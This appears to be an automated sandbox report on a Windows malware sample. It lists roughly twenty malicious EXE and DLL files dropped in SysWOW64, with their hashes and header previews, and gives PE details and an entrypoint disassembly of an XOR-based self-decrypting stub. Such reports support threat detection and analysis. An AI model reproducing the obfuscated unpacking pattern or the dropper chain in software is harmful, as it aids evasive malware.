                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0

                          C:\Windows\SysWOW64\Njaakj32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Fhedeo32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8861197809233476
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10dB+BDq9J5SV3DY:CSVVEPozmB7bB+FqX5S1D
                          MD5:B5068E654411D8D8F378AAE95E250E2D
                          SHA1:C239A9BA1967C3EF60486241A00F0F68D8C7E8A2
                          SHA-256:5C5BF61003FF3E3D94F5B51F2DA73D93C2D2B3DCD50E278E671E780F4834A942
                          SHA-512:FFFB4CD09906BBCE7CDDF58808B20437B809A81C54356CD718EB9D2E26529F6D4B4721D9CB7794D34DF6B0F09EFE76ACE512EF279AB0670DABC7909D61A78726
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Oceoll32.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Oeanchcn.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.02913940748877
                          Encrypted:false
                          SSDEEP:3072:veCGS2NqCREXdXNKT1ntPG9poDrFDHZtOgl:v/GS2NpCN9Otopg5tTl
                          MD5:1DB24B47BF090833A70E0BEA68A38D9F
                          SHA1:CB716EA372AF8307F8E34E235B12A6B1505F20CE
                          SHA-256:54607325797E16B65C4172CC2434B46F3A03D07C4DBE131CF0150EF9B2997682
                          SHA-512:5A4FA7D222BD6768500C5C49B56F0407FB765BC2D65BA2E34A1802F1C2F0862A485BAF41EFC144A4964FC473EC203B26A75D613F22649BB7BAFFD9058E2DFDD5
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Odekfoij.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Onkcje32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.030181619844008
                          Encrypted:false
                          SSDEEP:3072:HXhu4T4iOCREXdXNKT1ntPG9poDrFDHZtOgl:xT4ilCN9Otopg5tTl
                          MD5:A30DE8FF39A8563F2D7B9E36AD05A4C6
                          SHA1:7DDE7EC0FB55D6B6FF6224047F657DE638F19830
                          SHA-256:157AD38CD9398D3E4417DFCDEFB34ACC4D64CC6FA2A2F0233A5623A0ADC0ED23
                          SHA-512:9D551C50695FEC873872BDB4E2FF2CAC308C9FACDE2A06C0B6B499041BE8ECC52FF7775E7B675018BB224161224516F56F8923017B7C417674F3EAE00675A3E4
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Oeanchcn.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Olijjb32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.980910405679068
                          Encrypted:false
                          SSDEEP:3072:VkEnKvTQLd6CREXdXNKT1ntPG9poDrFDHZtOgl:VbK7C5CN9Otopg5tTl
                          MD5:1B2425A45E8ED6237FBE4E56F276A504
                          SHA1:13A669539D2E4EB49158373ED9DAE15B7CBEE095
                          SHA-256:E7FFCF839DE32DA0E59DC1892EC5E731FCDDA66BC09B882F74FC6683E2FC6092
                          SHA-512:C36C85039EA4C266FCFBB0FFF2AE24E5170E6977DF174679597EF78C07B7EDA99DC3DCC333407E6133DA4DDD3C88379EB3110D6B80D97BDDDD2E8EA9A6EF0FB6
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Ogjdllpi.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Nejhbi32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.038961167963333
                          Encrypted:false
                          SSDEEP:3072:F2/KBOdlr+ZcPHCREXdXNKT1ntPG9poDrFDHZtOgl:BBklrUcPiCN9Otopg5tTl
                          MD5:B9761DC0E2D962AEFE92F6E1F3C1F250
                          SHA1:260E38D113176FB2AE58B815BDE7B74A8E573AF6
                          SHA-256:847C160CDF5687852BF745FFF41FE02222CCAF249274412E3F20D9D2E43DEB2C
                          SHA-512:DB0E956791ED2B1BFE243AFC3D4205EE0E8FFED18F2B43BF09DEB350405951A6157578E8F7A3FB58682420417CBC9884C92DEFE9A1944E24BBD3A0CED9CFF1DD
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Oglabl32.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Opbieagi.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.026913608034047
                          Encrypted:false
                          SSDEEP:3072:CxmLxblMzKEkL1FCREXdXNKT1ntPG9poDrFDHZtOgl:DdblaKD1wCN9Otopg5tTl
                          MD5:EB5F811B6A66908B38FB889817D5988F
                          SHA1:957F7C45E8B4439E6757BC6D80278C8E54CF43C4
                          SHA-256:62CAB9F10A7B07FD9486C89F2D4123AA954015A0EDBAFC364D5EF962099F41DA
                          SHA-512:62DCD4343511C0AE70C468A2587A0E062925799C0859F926723D1F4E94BC5AE0AA5B7F26E92B955AA0147FF7A5B3D670978F2F4201ED077158FD52259E1B8E67
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Ojacofgb.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Odekfoij.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.980332951555747
                          Encrypted:false
                          SSDEEP:3072:6eBBxNNDjTTC4dYBCREXdXNKT1ntPG9poDrFDHZtOgl:6eDxNNDXe420CN9Otopg5tTl
                          MD5:AF41FAF03E8EAED376F154722746385B
                          SHA1:3C8D4BF7665EAA38019E91E719F95FC6C117C782
                          SHA-256:85B64BBFB21E2B7EAC68EE25F8EBED507276D1A8967EF17A455720793E4ECA18
                          SHA-512:67A6B37ADED237E91AC42DDDCF37BB86C02DF13021B4FD02734FBC8E3CBED7F97BBF11B7EE98765699D714A6F77B899D14563821A64339B14FDC88699D45654A
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Olijjb32.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Oglabl32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.983722913645044
                          Encrypted:false
                          SSDEEP:3072:Wmm/c0pnz7zrCREXdXNKT1ntPG9poDrFDHZtOgl:WmP0pnz7zeCN9Otopg5tTl
                          MD5:6E56FF877D11D4ED11AF106FBDDD4ACE
                          SHA1:0381230571396978F0A3D0736785AEE01D79BAA6
                          SHA-256:0741FB62D451ACA4432D1FA60F8EFE40C330C569D25D516FEE06138BD294678A
                          SHA-512:C3A6A71BED9905D926C82708C194DE094A2D52F59BDC5487DB55D04C00D88BB3B293B25FC7D5CAE3CE5D7725B0EE69156B44F9E87A86833B8C50A0FBD0441275
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Onkcje32.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Oceoll32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.021146031213954
                          Encrypted:false
                          SSDEEP:3072:FPHqRVNY68QvbuScCREXdXNKT1ntPG9poDrFDHZtOgl:u+683STCN9Otopg5tTl
                          MD5:7862075539A938767C526CCB7DF7CF4E
                          SHA1:6BE48DAB7AF44E69A9E17F1531740CD9CD5786C4
                          SHA-256:06B4319BD65DD7ACA5915F71D5D11941D784FEA0FD1EFD7A76E0F1050A4A0E38
                          SHA-512:B0DECF7C0F2EC3E94135DA1FD192CB9CBDEEB4871D1402E8BD6A1E3D474BAE23D658392BC21348E267149EA4381ADF7BA4CD21070478363E2E850B6257DC5328
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Opbieagi.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Ogjdllpi.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.967699551580477
                          Encrypted:false
                          SSDEEP:3072:ImNapHU/2FrfOJCREXdXNKT1ntPG9poDrFDHZtOgl:IZ2/2Q8CN9Otopg5tTl
                          MD5:04F64BB1853F025B09D78A47FA5C7F7B
                          SHA1:376C16590F5F0AEF5E8F91A5856C8D9E7C65DC1F
                          SHA-256:730126DAEDDC08C048D1B9F4777CB3F9E826DBCB0F7F2D4BC9F1B878AC0C1E6E
                          SHA-512:D00F594EFF2CCB2BAAB2087201DB5CF19CB994612D4768E4676E5B9A8FA67E8D83FF9A17843B3EDD745E252D6AD02F7CFA2D2A9DDFA0C851C737073CD0FCD7CD
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Pdkggn32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Oeanchcn.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8856460154820622
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10sB+BDq9J5SV3DY:CSVVEPozmB7CB+FqX5S1D
                          MD5:D96A5EAAFB573C44F2B7DF9DA7CA8EFD
                          SHA1:9D97EC65EBEA15170EAC95FEA82C95C1A74734DA
                          SHA-256:C71673677F8F8018E618E7AA6221C3FDA9298AB07E3B16528901644DEA541A1B
                          SHA-512:6E430E275F1C2135BDE8CBF9E9FC1820CF5BDE5DD5B7D337723CDD8966BC4078429A8841D9A51831B10B75BE525F9571E34A0A4B62431C87F4532C30DF8EE216
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Pdmohf32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Bgamkfnl.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8861415031675
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10ZeB+BDq9J5SV3DY:CSVVEPozmB7beB+FqX5S1D
                          MD5:450995A555635B8455333D74D6525ADD
                          SHA1:1D8ECC3CE389291A7B994B1BE0C01591E47481D3
                          SHA-256:475AD260D5D1FAB50E98BD29D6117ECF261DAD03DDFB3DFEDE6F56EFB9BBF9B3
                          SHA-512:A83621AA8D25C5EDB4FD4F83102EAE81C33C3104F00EC321F93CBB02405F46B683D3106C094BFCE89F938300F6252147712AD3A52BA379A2487F5B4B153BE63C
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Pfgpqb32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Dfcboo32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885743139619248
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU104B+BDq9J5SV3DY:CSVVEPozmB72B+FqX5S1D
                          MD5:68CDDAA046789A220AB319DD3732F89D
                          SHA1:E5751FDE9E7D6FFD692CF3A3E41F83A4504658AC
                          SHA-256:C2C071E5FED607D815D3CD0ACD2C6F77D3008C55EA874FECE02172892DBB5AB9
                          SHA-512:E6F2A329A6BAE7F39B742382DC7041204D7036B5E4226CCAAEA4FBBE4BFAC1B6B05E73518D9FF02A35FC05ED6CE58D34C4B347A2798EDA35623FE809900245C3
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Pkjmee32.dll

                          Download File
                          Process:C:\Windows\SysWOW64\Bnpnbp32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.886282171567183
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU101B+BDq9J5SV3DY:CSVVEPozmB73B+FqX5S1D
                          MD5:57D08F5E5CCC8794CAE1728B07F0ED12
                          SHA1:67B5CCB3B8914517B2067CA22891CAC8141653D1
                          SHA-256:98FC1574783A5D4F0A8C10B99836B4E5E9F66E96EFD69343CED116E851E7EEE2
                          SHA-512:6A56A4744296C0A6F71DF43C82629E5B0D1953B807CD8BBCB1C3C8BE37C956556B04C3EA0802F5C2E55F203A931F65362D3EA050D200E10D9BB1C892B9C77377
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Windows\SysWOW64\Plbmqa32.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Ppllkpoo.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.01978092876152
                          Encrypted:false
                          SSDEEP:3072:sOkE0AeYCREXdXNKT1ntPG9poDrFDHZtOgl:shXCN9Otopg5tTl
                          MD5:40D460D476E3EF9238CDEC233DCA293E
                          SHA1:F1D4CE681428A459ADF684C69A77301640E350D0
                          SHA-256:6B750A21921DB2C98DE4D96C09409A1D4E08F7BC4B49D7A055253419B2E0435A
                          SHA-512:152B05BED920F82597E04492CBDDDED2C47E339723F5704AA0B530FA1828AC7BC7A1A038815443013EAB68FC0D4BE28718921FA969433366E3705F08741923BC
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Plgflqpn.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Plbmqa32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.979986351954796
                          Encrypted:false
                          SSDEEP:3072:MQ6ZC4b3es7nl6cmJFlCREXdXNKT1ntPG9poDrFDHZtOgl:M9JLesRAJFQCN9Otopg5tTl
                          MD5:746D9DB8F43CEAFB79CE4693732F31F4
                          SHA1:A7D450C3CB3A96D42EF5CE09BFB551F423831449
                          SHA-256:9E86F5A3DACC77FF9C9B6BAC7EF39E39C2B6965FC631A119CFABB26C08A12BA1
                          SHA-512:41689B5FA96AD7D85ECE674CC77F9C9D6CF146E016445002EE3F953EEA86324B5B3629EEF3726EF2676A1F4E2882A5EFEE68B04F027F30B2053D9A2BFA2EF9BD
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Ppllkpoo.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Ojacofgb.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.037012142885527
                          Encrypted:false
                          SSDEEP:3072:ssCTAGKyCREXdXNKT1ntPG9poDrFDHZtOgl:sJKRCN9Otopg5tTl
                          MD5:38F64F662EE5C7E45202627AA7FCACCC
                          SHA1:536174057D893B4FC7607807874AB8979303F41D
                          SHA-256:635387B9B65BB9EB8CDBF145FCBBC0398EA084DB81A767A3F773AF5ACDCD578C
                          SHA-512:BAB80AB57E44242778D3E779D696025E0D97CFE17DCA634AACE9CFB8057EBBC1A083E3BC0E8B13E705B3C7638AE05CBD93CF7E3CA7C4E8272F05D160D50A5987
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Pqeoao32.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Plgflqpn.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.015742388700205
                          Encrypted:false
                          SSDEEP:3072:rE5fM7xnCREXdXNKT1ntPG9poDrFDHZtOgl:LCCN9Otopg5tTl
                          MD5:A195A0011B7154E41E7FCDE5D8B4E0CA
                          SHA1:61E015E46AAC8CEFC1FF9CE947785403FFB1DFD2
                          SHA-256:B135EA1A9426364B521AFA9D419BB823DD716BA6F3BF255AA2634ACD78DA3FB2
                          SHA-512:7DE018F4576CD66E301742DB965A4C8B2943BDDE02406AC079333442B0DE553CB0D19BCD8FA1AC32AD75E77A7E34AFBD2BB1EBF674C2ABE9E0B3C51FD73C6245
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          C:\Windows\SysWOW64\Qgcpihjl.exe

                          Download File
                          Process:C:\Windows\SysWOW64\Pqeoao32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.013558527102182
                          Encrypted:false
                          SSDEEP:3072:1YqlBq3SyVilCFCREXdXNKT1ntPG9poDrFDHZtOgl:1NySCwCN9Otopg5tTl
                          MD5:B46EDD174CAE8D3583851F8A26241E40
                          SHA1:8EFC1BC566B2CFF72ED4712BE9A06834D945AA17
                          SHA-256:BA14062931917EF30294A526366AE179B975361A256675B9B244876CCCBE2B24
                          SHA-512:AED874B82A3857F73790FF5E0A613594E46B374FCF7DD7725B0114631EBA96E936BC0E1833FD31D00066F463E1DBC33E4D5299F94302A80685D100465E5258DC
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):6.990103695539264
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • VXD Driver (31/22) 0.00%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:h879iieoae.exe
                          File size:131'072 bytes
                          MD5:b6ff4e20e2b53b684a7cb84630d836fa
                          SHA1:58f690a95f195f70e6fc59ce67855941bd817f7a
                          SHA256:55f3f17f1a264e2b9a8aa9d5750696688fc4a7bbd530ab74224db9939c974d09
                          SHA512:bf58689e3a5787eef3f39538af6131f6bcc25375ef7d9e6f7126a6b083a40be6c0f5c8984e0c0e7344264beefc139f1ef4cf0cbb0e834892d2e67229c99b393d
                          SSDEEP:3072:3j4B2SHQ2wmiWCgTaCREXdXNKT1ntPG9poDrFDHZtOgl:z4MgJwu/ZCN9Otopg5tTl
                          TLSH:84D37CCB67AB2761C253C1721ACF46E2A639B3E52F6C796063F44018036FE1951B3AD3
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@........................................................................

                          File Icon

                          Icon Hash:90cececece8e8eb0

                          Static PE Info

                          General

                          Entrypoint:0x42e000
                          Entrypoint Section:.embm
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          DLL Characteristics:
                          Time Stamp:0x5A78A2A7 [Mon Feb 5 18:29:59 2018 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:1
                          OS Version Minor:0
                          File Version Major:1
                          File Version Minor:0
                          Subsystem Version Major:1
                          Subsystem Version Minor:0
                          Import Hash:3485b7bb99be46d64b23612faba98357

                          Entrypoint Preview

                          Instruction
                          nop
                          nop
                          nop
                          nop
                          nop
                          pushad
                          call 00007FA1F942F806h
                          nop
                          nop
                          nop
                          nop
                          nop
                          pop eax
                          add eax, 00403AC5h
                          nop
                          nop
                          sub eax, 00403A6Bh
                          nop
                          nop
                          nop
                          nop
                          mov ebx, dword ptr [eax]
                          mov ecx, dword ptr [eax+04h]
                          nop
                          nop
                          nop
                          mov edx, dword ptr [eax+08h]
                          nop
                          nop
                          nop
                          xor dword ptr [ebx], edx
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          add ebx, 04h
                          nop
                          cmp ebx, ecx
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          jl 00007FA1F942F7EAh
                          nop
                          add eax, 0Ch
                          nop
                          nop
                          nop
                          cmp dword ptr [eax], 00000000h
                          nop
                          nop
                          nop
                          jne 00007FA1F942F7C9h
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          popad
                          nop
                          nop
                          jmp 00007FA1F94029B9h
                          add byte ptr [eax], dl
                          inc eax
                          add al, bh
                          jle 00007FA1F942F842h
                          add byte ptr [eax+00003B76h], bl
                          mov al, byte ptr [CD700042h]
                          inc edx
                          add byte ptr [edx+ebx*2+00002DFBh], ch
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          nop
                          nop
                          nop
                          mov ecx, ebx
                          nop
                          nop
                          nop
                          sub ecx, eax
                          nop
                          nop
                          nop
                          xor edx, edx
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          push eax
                          nop
                          nop
                          mov eax, ecx
                          nop
                          nop
                          nop
                          div edi
                          nop
                          nop
                          nop
                          nop
                          nop
                          xchg eax, ecx
                          nop
                          nop
                          nop
                          pop eax
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          mov esi, 05F33C26h
                          nop
                          nop
                          nop
                          nop
                          xor dword ptr [eax], esi
                          add eax, edi

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3c0000x118.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
